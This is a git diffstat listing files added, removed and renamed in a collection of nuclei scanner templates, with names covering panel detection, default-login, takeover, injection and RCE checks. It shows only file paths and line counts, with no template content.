| 17 - .../Other/campaignmonitor-844.yaml | 26 + .../Other/can-i-take-over-dns-852.yaml | 144 + .../Other/can-i-take-over-dns-853.yaml | 140 - .../Other/canal-default-login-846.yaml | 14 - .../Other/candidate-application-lfi-850.yaml | 27 - .../Other/candidate-application-lfi-851.yaml | 20 + .../Other/canny-takeover-854.yaml | 18 - .../Other/canny-takeover-856.yaml | 17 + .../Other/carestream-vue-detect-860.yaml | 30 + .../Other/carestream-vue-detect-861.yaml | 31 - .../Other/cargo-takeover-868.yaml | 15 - nuclei-templates/Other/cargo-takeover.yaml | 15 + .../Other/cargocollective-takeover-862.yaml | 20 + .../Other/cargocollective-takeover-864.yaml | 18 - nuclei-templates/Other/cas-login-870.yaml | 19 - nuclei-templates/Other/cas-login.yaml | 22 + nuclei-templates/Other/casbin.yaml | 21 + nuclei-templates/Other/cerebro-panel-881.yaml | 27 - nuclei-templates/Other/cerebro-panel.yaml | 26 + ...2.yaml => certificate-validation-884.yaml} | 0 .../Other/cf7-message-filter.yaml | 59 + nuclei-templates/Other/cgi-printenv-885.yaml | 26 + nuclei-templates/Other/cgi-printenv-886.yaml | 30 - nuclei-templates/Other/cgi-test-page-887.yaml | 24 + nuclei-templates/Other/cgi-test-page.yaml | 22 - .../Other/chamilo-lms-sqli-892.yaml | 30 - nuclei-templates/Other/chamilo-lms-sqli.yaml | 26 + .../Other/chamilo-lms-xss-893.yaml | 24 - nuclei-templates/Other/chamilo-lms-xss.yaml | 24 + ...et-crm-sqli.yaml => chanjet-CRM-sqli.yaml} | 0 ...anel-895.yaml => checkmarx-panel-897.yaml} | 0 ...t-panel-899.yaml => checkpoint-panel.yaml} | 0 .../Other/cherry-file-download-900.yaml | 31 + .../Other/cherry-file-download.yaml | 25 - nuclei-templates/Other/cherry-lfi-902.yaml | 36 - nuclei-templates/Other/cherry-lfi-903.yaml | 25 + ...-detect.yaml => chevereto-detect-905.yaml} | 0 .../Other/chinaunicom-default-login-906.yaml | 33 - .../Other/chinaunicom-default-login-908.yaml | 38 + nuclei-templates/Other/churchope-lfi-915.yaml | 32 - nuclei-templates/Other/churchope-lfi.yaml | 28 + .../Other/circarlife-setup-917.yaml | 28 + nuclei-templates/Other/circarlife-setup.yaml | 28 - .../Other/circleci-config-924.yaml | 26 - .../Other/circleci-config-925.yaml | 25 + .../Other/circleci-ssh-config-928.yaml | 27 + .../Other/circleci-ssh-config.yaml | 27 - ...yaml => cisco-ace-device-manager-931.yaml} | 0 .../Other/cisco-asa-panel-932.yaml | 22 - .../Other/cisco-asa-panel-934.yaml | 16 + .../Other/cisco-edge-340-936.yaml | 21 - nuclei-templates/Other/cisco-edge-340.yaml | 25 + .../Other/cisco-finesse-login-940.yaml | 23 - .../Other/cisco-finesse-login.yaml | 22 + .../Other/cisco-integrated-login-943.yaml | 23 - .../Other/cisco-integrated-login.yaml | 22 + ...re-944.yaml => cisco-meraki-exposure.yaml} | 0 .../Other/cisco-network-config-950.yaml | 25 + .../Other/cisco-network-config.yaml | 24 - ...ml => cisco-prime-infrastructure-952.yaml} | 0 nuclei-templates/Other/cisco-sd-wan-957.yaml | 26 - nuclei-templates/Other/cisco-sd-wan.yaml | 25 + ...960.yaml => cisco-secure-desktop-962.yaml} | 0 .../Other/cisco-sendgrid-965.yaml | 31 + .../Other/cisco-sendgrid-967.yaml | 30 - .../Other/cisco-smi-exposure-970.yaml | 33 - .../Other/cisco-smi-exposure.yaml | 33 + ...ogin.yaml => cisco-systems-login-975.yaml} | 0 .../Other/cisco-telepresence-976.yaml | 24 - .../Other/cisco-telepresence.yaml | 25 + ...ogin.yaml => cisco-ucs-kvm-login-980.yaml} | 0 .../Other/citrix-adc-gateway-detect-981.yaml | 20 - .../Other/citrix-adc-gateway-detect.yaml | 16 + .../Other/citrix-vpn-detect-987.yaml | 16 + nuclei-templates/Other/citrix-vpn-detect.yaml | 16 - .../Other/ckan-dom-based-xss.yaml | 5 - .../Other/cl-te-http-smuggling.yaml | 37 - ...el-996.yaml => clave-login-panel-994.yaml} | 0 ...yaml => clearpass-policy-manager-997.yaml} | 0 .../Other/clickhouse-unauth-1002.yaml | 29 - nuclei-templates/Other/clickhouse-unauth.yaml | 20 + .../Other/clientaccesspolicy-1005.yaml | 25 + .../Other/clientaccesspolicy-1007.yaml | 25 - .../Other/clockwatch-enterprise-rce-1008.yaml | 6 - .../clockwork-dashboard-exposure-1015.yaml | 31 + .../Other/clockwork-dashboard-exposure.yaml | 27 - .../Other/clockwork-php-page-1019.yaml | 25 + .../Other/clockwork-php-page.yaml | 22 - ...f.yaml => cloudflare-image-ssrf-1021.yaml} | 0 ...udinary-1026.yaml => cloudinary-1025.yaml} | 0 .../Other/cname-service-detection-1031.yaml | 37 + .../Other/cname-service-detection-1032.yaml | 33 - ....yaml => cname-service-detector-1034.yaml} | 0 .../Other/cnvd-2018-13393-1037.yaml | 25 + .../Other/cnvd-2018-13393-1038.yaml | 21 - ...9-01348.yaml => cnvd-2019-01348-1044.yaml} | 0 .../Other/cnvd-2019-06255-1049.yaml | 33 - .../Other/cnvd-2019-06255-1050.yaml | 33 + nuclei-templates/Other/cnvd-2019-17294.yaml | 37 - .../Other/cnvd-2019-19299-1051.yaml | 50 - .../Other/cnvd-2019-19299-1052.yaml | 43 + ...9-32204.yaml => cnvd-2019-32204-1054.yaml} | 0 .../Other/cnvd-2020-23735-1058.yaml | 14 +- .../Other/cnvd-2020-46552-1060.yaml | 32 + nuclei-templates/Other/cnvd-2020-46552.yaml | 30 - .../Other/cnvd-2020-56167-1064.yaml | 30 + .../Other/cnvd-2020-62422-1067.yaml | 27 - .../Other/cnvd-2020-62422-1069.yaml | 32 + .../Other/cnvd-2020-67113-1071.yaml | 6 + .../Other/cnvd-2021-01931-1079.yaml | 5 +- .../Other/cnvd-2021-09650-1080.yaml | 3 - .../Other/cnvd-2021-10543-1082.yaml | 21 - .../Other/cnvd-2021-10543-1084.yaml | 22 + ...22-1092.yaml => cnvd-2021-15822-1093.yaml} | 0 .../Other/cnvd-2021-15824-1096.yaml | 32 + .../Other/cnvd-2021-15824-1097.yaml | 36 - .../Other/cnvd-2021-17369-1102.yaml | 32 + .../Other/cnvd-2021-26422-1103.yaml | 36 - .../Other/cnvd-2021-26422-1104.yaml | 25 + .../Other/cnvd-2021-30167-1108.yaml | 44 + .../Other/cnvd-2021-30167-1109.yaml | 36 - ...1.yaml => cobbler-default-login-1120.yaml} | 0 .../Other/cockpit-detect-1125.yaml | 16 + .../Other/cockpit-detect-1127.yaml | 15 - ...rkflow.yaml => cockpit-workflow-1129.yaml} | 0 .../Other/codemeter-webadmin-panel-1135.yaml | 25 + .../Other/codemeter-webadmin-panel-1137.yaml | 27 - ...-login-1140.yaml => codian-mcu-login.yaml} | 0 .../Other/cofense-vision-panel-1141.yaml | 20 - .../Other/cofense-vision-panel-1142.yaml | 28 + ...1149.yaml => cold-fusion-cfcache-map.yaml} | 0 .../coldfusion-administrator-login-1145.yaml | 26 - .../Other/coldfusion-administrator-login.yaml | 24 + .../Other/coldfusion-debug-xss-1152.yaml | 29 + .../Other/coldfusion-debug-xss-1154.yaml | 34 - .../commax-biometric-auth-bypass-1157.yaml | 33 + .../Other/commax-biometric-auth-bypass.yaml | 30 - .../commax-credentials-disclosure-1158.yaml | 26 - .../Other/commax-credentials-disclosure.yaml | 25 + .../comtrend-password-exposure-1166.yaml | 28 - .../Other/comtrend-password-exposure.yaml | 23 + .../Other/concourse-ci-panel-1169.yaml | 24 + .../Other/concourse-ci-panel.yaml | 19 - nuclei-templates/Other/concrete-xss-1177.yaml | 35 + nuclei-templates/Other/concrete-xss-1178.yaml | 30 - .../Other/concrete5-install-1171.yaml | 33 - nuclei-templates/Other/concrete5-install.yaml | 29 + .../Other/concrete5-panel-1172.yaml | 32 + nuclei-templates/Other/concrete5-panel.yaml | 33 - ...3.yaml => configuration-listing-1182.yaml} | 0 .../Other/confluence-detect-1187.yaml | 41 + nuclei-templates/Other/confluence-detect.yaml | 41 - ...l => confluence-ssrf-sharelinks-1192.yaml} | 0 .../{contacam-1197.yaml => contacam.yaml} | 0 .../Other/content-scheme-1205.yaml | 16 - nuclei-templates/Other/content-scheme.yaml | 15 + .../Other/contentkeeper-detect-1203.yaml | 32 + .../Other/contentkeeper-detect.yaml | 31 - .../Other/core-chuangtian-cloud-rce-1209.yaml | 38 + .../Other/core-chuangtian-cloud-rce-1211.yaml | 41 - .../coremail-config-disclosure-1215.yaml | 27 + .../Other/coremail-config-disclosure.yaml | 24 - ...2.yaml => couchbase-buckets-api-1233.yaml} | 0 ...e-1239.yaml => couchdb-exposure-1238.yaml} | 0 nuclei-templates/Other/couchdb-fauxton.yaml | 4 +- .../Other/craft-cms-detect-1247.yaml | 28 - nuclei-templates/Other/craft-cms-detect.yaml | 27 + .../Other/craftcms-admin-panel-1245.yaml | 21 + .../Other/craftcms-admin-panel.yaml | 25 - .../Other/credential-exposure-1249.yaml | 715 + .../Other/credential-exposure-file.yaml | 720 - nuclei-templates/Other/credentials-1257.yaml | 16 - .../Other/credentials-disclosure-1252.yaml | 712 + .../Other/credentials-disclosure.yaml | 715 - nuclei-templates/Other/credentials.yaml | 13 + nuclei-templates/Other/crlf-injection.yaml | 10 +- nuclei-templates/Other/crmeb-sqli.yaml | 20 - .../Other/crossdomain-xml-1267.yaml | 3 +- ...detect.yaml => crush-ftp-detect-1271.yaml} | 0 ...p-login-1275.yaml => crush-ftp-login.yaml} | 0 .../cs-cart-unauthenticated-lfi-1281.yaml | 26 - .../Other/cs-cart-unauthenticated-lfi.yaml | 20 + .../Other/cs141-default-login-1280.yaml | 50 + .../Other/cs141-default-login.yaml | 44 - .../Other/csrfguard-detect-1291.yaml | 71 - nuclei-templates/Other/csrfguard-detect.yaml | 72 + .../Other/custom-solr-file-read.yaml | 37 - nuclei-templates/Other/custom-xss-check.yaml | 41 - nuclei-templates/Other/custom_nuclei-7.yaml | 44 + ...ud-login.yaml => cx-cloud-login-6765.yaml} | 0 ...045.yaml => d-link-arbitary-fileread.yaml} | 0 .../Other/d-link-wireless-7050.yaml | 23 + nuclei-templates/Other/d-link-wireless.yaml | 23 - .../dahua-wpms-addimgico-fileupload.yaml | 68 + ...\347\220\206\345\271\263\345\217\260.yaml" | 43 + .../Other/darkstat-detect-6767.yaml | 34 + nuclei-templates/Other/darkstat-detect.yaml | 33 - .../Other/database-error-6770.yaml | 19 - nuclei-templates/Other/database-error.yaml | 20 + .../Other/db-backup-lfi-6775.yaml | 7 +- .../{db-schema-6783.yaml => db-schema.yaml} | 0 .../Other/dbeaver-credentials-6779.yaml | 35 - .../Other/dbeaver-credentials-6782.yaml | 24 + .../Other/dead-host-with-cname-6786.yaml | 22 - .../Other/dead-host-with-cname-6787.yaml | 23 + ...dedecms-carbuyaction-fileinclude-6794.yaml | 24 + .../dedecms-carbuyaction-fileinclude.yaml | 29 - .../Other/dedecms-membergroup-sqli-6796.yaml | 27 + .../Other/dedecms-membergroup-sqli-6798.yaml | 20 - ...03.yaml => dedecms-openredirect-6802.yaml} | 0 .../Other/default-apache-test-page-6816.yaml | 17 - .../Other/default-apache-test-page-6817.yaml | 19 + .../Other/default-apache2-page-6806.yaml | 20 + .../Other/default-apache2-page.yaml | 19 - .../default-apache2-ubuntu-page-6810.yaml | 2 - .../Other/default-codeigniter-page-6831.yaml | 23 + .../Other/default-codeigniter-page-6832.yaml | 24 - .../Other/default-django-page-6840.yaml | 17 + .../Other/default-django-page.yaml | 17 - .../Other/default-fastcgi-page-6844.yaml | 17 - .../Other/default-fastcgi-page-6845.yaml | 18 + ...age.yaml => default-fedora-page-6850.yaml} | 0 .../default-glassfish-server-page-6853.yaml | 3 +- ...6857.yaml => default-ibm-http-server.yaml} | 0 ...-page.yaml => default-iis7-page-6859.yaml} | 0 ...6864.yaml => default-jetty-page-6862.yaml} | 0 .../Other/default-lighttpd-page-6866.yaml | 22 + .../Other/default-lighttpd-page.yaml | 20 - ...=> default-microsoft-azure-page-6874.yaml} | 0 .../Other/default-movable-page-6878.yaml | 17 + .../Other/default-movable-page.yaml | 17 - .../Other/default-nginx-page-6881.yaml | 17 - .../Other/default-nginx-page-6882.yaml | 19 + ...-6886.yaml => default-openresty-6884.yaml} | 0 .../default-oracle-application-page-6891.yaml | 3 - .../default-payara-server-page-6895.yaml | 5 +- .../Other/default-plesk-page-6900.yaml | 3 +- ...aml => default-redhat-test-page-6904.yaml} | 0 .../Other/default-ssltls-test-page-6907.yaml | 19 - .../Other/default-ssltls-test-page-6908.yaml | 18 + ...age.yaml => default-tomcat-page-6911.yaml} | 0 .../default-windows-server-page-6912.yaml | 19 - .../Other/default-windows-server-page.yaml | 17 + .../Other/defectdojo-panel-6916.yaml | 16 + nuclei-templates/Other/defectdojo-panel.yaml | 19 - .../Other/dell-idrac-default-login-6942.yaml | 44 + .../Other/dell-idrac-default-login-6943.yaml | 38 - ...low.yaml => dell-idrac-workflow-6947.yaml} | 0 .../Other/dell-idrac6-detect-6918.yaml | 29 + .../Other/dell-idrac6-detect-6919.yaml | 25 - .../Other/dell-idrac7-detect-6922.yaml | 25 + .../Other/dell-idrac7-detect-6924.yaml | 29 - .../Other/dell-idrac9-default-login-6934.yaml | 37 - .../Other/dell-idrac9-default-login.yaml | 30 + .../Other/dell-idrac9-detect-6937.yaml | 36 + .../Other/dell-idrac9-detect.yaml | 35 - .../Other/dell-openmanager-login-6949.yaml | 23 + .../Other/dell-openmanager-login-6950.yaml | 26 - .../Other/dell-wyse-login-6954.yaml | 24 + .../Other/dell-wyse-login-6955.yaml | 20 - .../Other/deprecated-tls-6959.yaml | 25 + nuclei-templates/Other/deprecated-tls.yaml | 17 - .../detect-addpac-voip-gateway-6963.yaml | 26 + .../Other/detect-addpac-voip-gateway.yaml | 30 - .../Other/detect-all-takovers.yaml | 183 - .../Other/detect-dangling-cname-6967.yaml | 5 - .../Other/detect-dns-over-https-6969.yaml | 31 - .../Other/detect-dns-over-https-6970.yaml | 28 + .../Other/detect-drone-config-6973.yaml | 22 + .../Other/detect-drone-config.yaml | 26 - .../Other/detect-jabber-xmpp-6974.yaml | 25 + .../Other/detect-jabber-xmpp.yaml | 20 - .../Other/detect-options-method-6977.yaml | 19 + .../Other/detect-options-method.yaml | 16 - .../Other/detect-rsyncd-6979.yaml | 29 + .../Other/detect-rsyncd-6980.yaml | 27 - .../Other/detect-sentry-6983.yaml | 5 +- nuclei-templates/Other/development-logs.yaml | 5 + ...s-lfi-6993.yaml => dicoogle-pacs-lfi.yaml} | 0 ...nage-rce.yaml => digital-signage-rce.yaml} | 0 nuclei-templates/Other/dir-listing-7008.yaml | 16 - nuclei-templates/Other/dir-listing.yaml | 19 + .../Other/directadmin-login-panel-7000.yaml | 23 + .../Other/directadmin-login-panel-7001.yaml | 27 - .../Other/discourse-xss-7013.yaml | 28 - nuclei-templates/Other/discourse-xss.yaml | 24 + .../Other/discuz-config-global.yaml | 10 +- .../Other/display-via-header-7017.yaml | 2 +- ...anel.yaml => django-admin-panel-7021.yaml} | 0 .../Other/django-debug-detect-7027.yaml | 21 - ...1.yaml => django-debug-exposure-csrf.yaml} | 0 nuclei-templates/Other/django-debug.yaml | 25 + nuclei-templates/Other/django-debugmode.yaml | 8 +- ... => django-framework-exceptions-7034.yaml} | 0 nuclei-templates/Other/django-secret-key.yaml | 28 + nuclei-templates/Other/django-secret.key.yaml | 46 - .../Other/dlink-850L-info-leak.yaml | 29 + .../Other/dlink-850l-info-leak-7038.yaml | 27 - .../Other/dns-waf-detect-7052.yaml | 137 - .../Other/dns-waf-detect-7053.yaml | 171 + .../Other/dnssec-detection-7051.yaml | 22 - nuclei-templates/Other/dnssec-detection.yaml | 19 + ...ord-sqli.yaml => doccms-keyword-sqli.yaml} | 0 nuclei-templates/Other/docker-api.yaml | 29 - .../Other/docker-compose-config-7059.yaml | 5 - .../Other/docker-registry-7067.yaml | 22 + .../Other/docker-registry-7068.yaml | 23 - .../Other/dockercfg-config-7055.yaml | 32 - .../Other/dockercfg-config-7056.yaml | 26 + .../dockerfile-hidden-disclosure-7063.yaml | 32 + .../Other/dockerfile-hidden-disclosure.yaml | 27 - nuclei-templates/Other/dokmee ecm.yaml | 19 + .../dolphinscheduler-default-login-7072.yaml | 42 - .../dolphinscheduler-default-login-7073.yaml | 42 + nuclei-templates/Other/dom-xss-7079.yaml | 43 + nuclei-templates/Other/domcfg-page-7077.yaml | 25 - nuclei-templates/Other/domcfg-page.yaml | 22 + nuclei-templates/Other/domxss.yaml | 43 - ...ct-7083.yaml => dotclear-detect-7084.yaml} | 0 .../Other/dotnetcms-sqli-7089.yaml | 29 + .../Other/druid-console-exposure-7092.yaml | 19 + .../Other/druid-console-exposure-7094.yaml | 16 - ...096.yaml => druid-default-login-7097.yaml} | 0 .../Other/druid-monitor-7100.yaml | 21 - .../Other/druid-monitor-7102.yaml | 22 + ...all-7106.yaml => drupal-install-7107.yaml} | 0 ...9.yaml => drupal-user-enum-ajax-7111.yaml} | 0 .../Other/drupal-user-enum-redirect-7115.yaml | 14 +- .../{ds_store.yaml => ds_store-7119.yaml} | 0 .../Other/{DSE855.yaml => dse855.yaml} | 0 .../Other/dss-download-fileread-7116.yaml | 24 + .../Other/dss-download-fileread-7117.yaml | 27 - .../Other/duomicms-sql-injection-7122.yaml | 25 - .../Other/duomicms-sql-injection-7125.yaml | 27 + ...ogin-7129.yaml => dvwa-default-login.yaml} | 0 ...> dvwa-headless-automatic-login-7133.yaml} | 0 .../Other/dwr-index-detect-7134.yaml | 29 + .../Other/dwr-index-detect-7135.yaml | 23 - .../Other/dwsync-exposure-7139.yaml | 35 + nuclei-templates/Other/dwsync-exposure.yaml | 30 - ...l => dynamic-broadcast-receiver-7140.yaml} | 0 .../Other/dynamicweb-panel-7143.yaml | 36 - .../Other/dynamicweb-panel-7144.yaml | 30 + ....yaml => dzs-zoomsounds-listing-7147.yaml} | 0 .../easy-media-gallery-pro-listing-7150.yaml | 25 - .../easy-media-gallery-pro-listing-7153.yaml | 22 + .../Other/easy-wp-smtp-listing-7154.yaml | 2 + .../eatery-restaurant-open-redirect-7158.yaml | 18 + .../eatery-restaurant-open-redirect.yaml | 18 - .../Other/ec2-detection-7163.yaml | 13 +- .../ecology-arbitrary-file-upload-7169.yaml | 45 + .../Other/ecology-arbitrary-file-upload.yaml | 35 - ...ogy-filedownload-directory-traversal.yaml} | 0 ...ecology-oa-HrmCareerApplyPerView-sqli.yaml | 52 + ...ecology_E-Office_Uploadify_FileUpload.yaml | 29 - .../Other/eg-manager-detect-7184.yaml | 25 + nuclei-templates/Other/eg-manager-detect.yaml | 20 - .../Other/elFinder-path-traversal.yaml | 37 - .../Other/elasticbeantalk-takeover-7188.yaml | 43 + .../Other/elasticbeantalk-takeover.yaml | 36 - .../Other/elasticsearch-7196.yaml | 34 - nuclei-templates/Other/elasticsearch.yaml | 23 + .../Other/elex-woocommerce-xss-7200.yaml | 48 - .../Other/elex-woocommerce-xss.yaml | 35 + .../Other/elfinder-path-traversal(1).yaml | 27 + .../Other/elfinder-version-7205.yaml | 37 - nuclei-templates/Other/elfinder-version.yaml | 38 + .../Other/emcecom-default-login-7211.yaml | 32 + .../Other/emcecom-default-login-7212.yaml | 45 - .../Other/emerson-power-panel-7217.yaml | 4 - ...ate-sqli.yaml => empirecms-rate-sqli.yaml} | 0 ...recms-xss-7220.yaml => empirecms-xss.yaml} | 0 ...7222.yaml => emqx-default-login-7221.yaml} | 0 ...el-7225.yaml => ems-login-panel-7223.yaml} | 0 nuclei-templates/Other/env.yaml | 24 + ...p-login-7229.yaml => epmp-login-7231.yaml} | 0 .../Other/epson-projector-detect-7238.yaml | 27 + .../Other/epson-projector-detect.yaml | 26 - .../Other/epson-web-control-detect-7242.yaml | 28 - .../Other/epson-web-control-detect.yaml | 22 + ...-series-7244.yaml => epson-wf-series.yaml} | 0 .../erp-nc-directory-traversal-7245.yaml | 28 - .../erp-nc-directory-traversal-7248.yaml | 24 + .../Other/error-based-sql-injection-7249.yaml | 482 + .../Other/error-based-sql-injection.yaml | 476 - .../Other/{time.yaml => error-based.yaml} | 0 ...or-logs-7255.yaml => error-logs-7252.yaml} | 0 .../Other/esmtprc-config-7258.yaml | 27 + nuclei-templates/Other/esmtprc-config.yaml | 28 - .../{etcd-keys-7261.yaml => etcd-keys.yaml} | 0 .../Other/etouch-v2-sqli-7266.yaml | 26 - nuclei-templates/Other/etouch-v2-sqli.yaml | 22 + .../ewebs-arbitrary-file-reading-7270.yaml | 5 + .../Other/exacqvision-default-login-7274.yaml | 42 - .../Other/exacqvision-default-login-7275.yaml | 49 + nuclei-templates/Other/example-template.yaml | 58 - .../Other/exploit-cve-2022-1388.yaml | 66 - ...detect-7279.yaml => expn-mail-detect.yaml} | 0 nuclei-templates/Other/exposed-adb-7280.yaml | 28 + nuclei-templates/Other/exposed-adb-7281.yaml | 22 - ...ing.yaml => exposed-alps-spring-7285.yaml} | 0 .../exposed-authentication-asmx-7288.yaml | 7 +- ...eeper.yaml => exposed-bitkeeper-7291.yaml} | 0 nuclei-templates/Other/exposed-bzr-7295.yaml | 3 +- ...sed-darcs-7298.yaml => exposed-darcs.yaml} | 0 .../Other/exposed-docker-api-7301.yaml | 29 + .../Other/exposed-gitignore-7303.yaml | 41 +- .../Other/exposed-glances-api-7309.yaml | 25 - .../Other/exposed-glances-api.yaml | 27 + .../exposed-jquery-file-upload-7315.yaml | 25 - .../Other/exposed-jquery-file-upload.yaml | 21 + .../Other/exposed-kibana-7319.yaml | 22 - .../Other/exposed-kibana-7320.yaml | 25 + ...sed-nomad-7329.yaml => exposed-nomad.yaml} | 0 .../Other/exposed-redis-7335.yaml | 23 + .../Other/exposed-redis-7336.yaml | 23 - ...343.yaml => exposed-service-now-7342.yaml} | 0 .../Other/exposed-sharepoint-list-7346.yaml | 2 +- .../Other/exposed-springboot.yaml | 34 + ....yaml => exposed-sqlite-manager-7350.yaml} | 0 ...ed-svn-7351.yaml => exposed-svn-7354.yaml} | 0 .../Other/exposed-webalizer-7358.yaml | 18 - nuclei-templates/Other/exposed-webalizer.yaml | 18 + ...eeper.yaml => exposed-zookeeper-7363.yaml} | 0 ...ost (copy 1).yaml => expresslfr_post.yaml} | 0 nuclei-templates/Other/exsi-system-7366.yaml | 20 - nuclei-templates/Other/exsi-system.yaml | 23 + ...ui.yaml => extreme-netconfig-ui-7372.yaml} | 0 nuclei-templates/Other/eyelock-nano-lfd.yaml | 12 +- .../Other/f-secure-policy-manager-7564.yaml | 20 + .../Other/f-secure-policy-manager.yaml | 23 - .../Other/facebook-client-id-7385.yaml | 16 + .../Other/facebook-client-id.yaml | 16 - nuclei-templates/Other/facebook-secrets.yaml | 35 - ...tion.yaml => fanruan-deserialization.yaml} | 0 ...390.yaml => fanruanoa2012-disclosure.yaml} | 0 .../Other/faraday-login-7395.yaml | 23 - .../Other/faraday-login-7397.yaml | 24 + ...-docs-7399.yaml => fastapi-docs-7398.yaml} | 0 .../Other/fastjson-1-2-41-rce-7403.yaml | 35 + .../Other/fastjson-1-2-41-rce-7404.yaml | 31 - .../Other/fastjson-1-2-42-rce.yaml | 9 +- ...rce.yaml => fastjson-1-2-43-rce-7412.yaml} | 0 .../Other/fastjson-1-2-47-rce-7415.yaml | 47 - .../Other/fastjson-1-2-47-rce.yaml | 40 + .../Other/fastjson-1-2-62-rce-7420.yaml | 34 + .../Other/fastjson-1-2-62-rce.yaml | 30 - ...rce-7423.yaml => fastjson-1-2-67-rce.yaml} | 0 .../Other/fastjson-1-2-68-rce-7425.yaml | 57 - .../Other/fastjson-1-2-68-rce.yaml | 49 + .../Other/fatpipe-auth-bypass-7431.yaml | 39 - .../Other/fatpipe-auth-bypass.yaml | 33 + ...nel-7436.yaml => fatpipe-ipvpn-panel.yaml} | 0 .../Other/favicon-detection-7441.yaml | 2051 - nuclei-templates/Other/favicon-detection.yaml | 2034 + .../Other/fcm-server-key-7452.yaml | 16 + .../Other/fcm-server-key-7453.yaml | 19 - .../Other/feedpress-takeover-7456.yaml | 18 + .../Other/feedpress-takeover-7457.yaml | 15 - nuclei-templates/Other/feedwordpress-xss.yaml | 3 +- .../Other/feifeicms-lfr-7462.yaml | 26 - .../Other/feifeicms-lfr-7466.yaml | 33 + nuclei-templates/Other/file-scheme-7468.yaml | 15 + nuclei-templates/Other/file-scheme-7469.yaml | 16 - nuclei-templates/Other/filezilla-7470.yaml | 26 - nuclei-templates/Other/filezilla.yaml | 25 + .../Other/finereport-path-traversal-7478.yaml | 7 +- ...on-7484.yaml => fiorilaunchpad-logon.yaml} | 0 .../Other/firebase-config-exposure-7485.yaml | 8 +- .../Other/firebase-database-7489.yaml | 17 + .../Other/firebase-database-7490.yaml | 17 - .../Other/firebase-detect-7493.yaml | 20 - .../Other/firebase-detect-7494.yaml | 17 + .../Other/firebase-urls-7498.yaml | 23 + .../Other/firebase-urls-7499.yaml | 23 - ... => fireware-xtm-user-authentication.yaml} | 0 .../Other/flexbe-takeover-7505.yaml | 23 - .../Other/flexbe-takeover-7506.yaml | 23 + .../Other/flightpath-panel-7508.yaml | 24 - nuclei-templates/Other/flightpath-panel.yaml | 25 + .../Other/flink-exposure-7509.yaml | 17 - nuclei-templates/Other/flink-exposure.yaml | 17 + ...ogin.yaml => flir-default-login-7513.yaml} | 0 .../Other/flywheel-takeover-7525.yaml | 7 +- nuclei-templates/Other/forcepoint-7529.yaml | 25 + nuclei-templates/Other/forcepoint.yaml | 30 - .../Other/fortinet-fortigate-panel-7533.yaml | 2 +- .../foulenzer-subdomain-tk (copy 1).yaml | 387 + .../Other/freshdesk-takeover-7540.yaml | 22 - .../Other/freshdesk-takeover.yaml | 22 + .../Other/front-page-misconfig-7547.yaml | 25 - .../Other/front-page-misconfig-7548.yaml | 23 + .../Other/frontify-takeover-7544.yaml | 8 +- .../Other/froxlor-detect-7551.yaml | 48 +- .../Other/frp-default-login-7557.yaml | 35 - .../Other/frp-default-login-7559.yaml | 41 + .../Other/ftp-default-credentials.yaml | 30 + nuclei-templates/Other/ftp-default-creds.yaml | 22 - .../Other/ftp-weak-credentials-7569.yaml | 6 + nuclei-templates/Other/ftpconfig-7565.yaml | 25 + nuclei-templates/Other/ftpconfig-7566.yaml | 30 - .../Other/fuelcms-default-login-7572.yaml | 16 +- nuclei-templates/Other/gSOAP-LFl.yaml | 31 - .../Other/ganglia-xml-grid-monitor-7573.yaml | 26 + .../Other/ganglia-xml-grid-monitor.yaml | 26 - .../Other/gemfury-takeover-7576.yaml | 19 + .../Other/gemfury-takeover-7579.yaml | 16 - ...ens-7580.yaml => general-tokens-7586.yaml} | 0 .../Other/generic-linux-lfi-7588.yaml | 42 - .../Other/generic-linux-lfi-7589.yaml | 45 + .../Other/generic-windows-lfi-7592.yaml | 29 - .../Other/generic-windows-lfi.yaml | 32 + .../geovision-geowebserver-lfi-7595.yaml | 31 - .../geovision-geowebserver-lfi-7596.yaml | 32 + .../geovision-geowebserver-xss-7600.yaml | 34 - .../Other/geovision-geowebserver-xss.yaml | 28 + nuclei-templates/Other/gespage-panel.yaml | 7 +- nuclei-templates/Other/get-override-sni.yaml | 18 - ...09.yaml => getresponse-takeover-7608.yaml} | 0 .../Other/getsimple-cms-detect-7614.yaml | 6 +- .../Other/getsimple-cms-detector-7613.yaml | 22 + .../Other/getsimple-cms-detector.yaml | 22 - .../Other/getsimple-installation-7618.yaml | 26 + .../Other/getsimple-installation.yaml | 22 - ...le-leakage.yaml => getsimple-leakage.yaml} | 0 .../Other/ghost-takeover-7620.yaml | 20 - .../Other/ghost-takeover-7621.yaml | 21 + nuclei-templates/Other/git-config-7635.yaml | 26 + nuclei-templates/Other/git-config-7636.yaml | 31 - ...l => git-config-nginxoffbyslash-7631.yaml} | 0 .../git-credentials-disclosure-7639.yaml | 33 - .../Other/git-credentials-disclosure.yaml | 32 + nuclei-templates/Other/git-mailmap-7710.yaml | 19 - nuclei-templates/Other/git-mailmap.yaml | 38 + ...k-detect.yaml => gitbook-detect-7624.yaml} | 0 .../Other/gitbook-takeover-7626.yaml | 3 - ...-login-7645.yaml => gitea-login-7646.yaml} | 0 ...aml => github-enterprise-detect-7649.yaml} | 0 ...es.yaml => github-gemfile-files-7652.yaml} | 0 .../Other/github-page-config-7655.yaml | 4 +- .../Other/github-takeover-7660.yaml | 24 + .../Other/github-takeover-7663.yaml | 20 - ... => github-workflows-disclosure-7665.yaml} | 0 .../Other/gitlab-api-user-enum.yaml | 2 - ...ab-detect.yaml => gitlab-detect-7673.yaml} | 0 .../Other/gitlab-public-repos-7677.yaml | 27 + .../Other/gitlab-public-repos-7680.yaml | 29 - ...83.yaml => gitlab-public-signup-7684.yaml} | 0 .../Other/gitlab-public-snippets-7685.yaml | 35 + .../Other/gitlab-public-snippets-7686.yaml | 30 - nuclei-templates/Other/gitlab-rce-7692.yaml | 56 - nuclei-templates/Other/gitlab-rce-7693.yaml | 64 + .../Other/gitlab-uninitialized-password.yaml | 4 +- ...r-enum.yaml => gitlab-user-enum-7701.yaml} | 0 .../Other/gitlab-weak-login-7704.yaml | 58 - .../Other/gitlab-weak-login-7705.yaml | 47 + ...7715.yaml => global-domains-lfi-7714.yaml} | 0 .../Other/global-domains-xss-7717.yaml | 30 - .../Other/global-domains-xss-7718.yaml | 24 + ...nel.yaml => globalprotect-panel-7719.yaml} | 0 ...gloo-unauth.yaml => gloo-unauth-7722.yaml} | 0 .../Other/glpi-9.3.3-sql-injection(1).yaml | 30 + ...ion.yaml => glpi-authentication-7729.yaml} | 0 .../Other/glpi-default-login-7731.yaml | 63 + .../Other/glpi-default-login-7733.yaml | 72 - ...ml => glpi-telemetry-disclosure-7738.yaml} | 0 